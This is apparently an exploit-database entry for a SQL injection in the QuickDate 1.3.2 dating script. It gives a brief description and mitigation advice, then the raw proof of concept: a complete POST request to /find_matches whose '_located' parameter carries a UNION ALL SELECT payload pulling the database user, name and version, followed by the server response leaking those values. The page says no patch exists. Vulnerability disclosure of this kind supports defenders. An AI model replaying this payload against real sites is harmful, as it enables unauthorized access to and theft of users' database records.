QuickDate 1.3.2 - SQL Injection

vendor:

QuickDate

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: QuickDate

Affected Version From: 1.3.2

Affected Version To: 1.3.2

Patch Exists: NO

Related CWE: N/A

CPE: a:quickdatescript:quickdate:1.3.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

QuickDate 1.3.2 – SQL Injection

QuickDate 1.3.2 is vulnerable to SQL Injection. An attacker can send a malicious POST request to the application with a crafted payload to inject malicious SQL queries into the application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: QuickDate 1.3.2 - SQL Injection
# Dork: N/A
# Date: 2020-02-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://quickdatescript.com/
# Version: 1.3.2
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
POST /find_matches HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 425
Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
# 
# 
HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 15:05:34 GMT
Server: Apache
Connection: Keep-alive, close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: application/json; charset=UTF-8
Content-Length: 3844

{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
#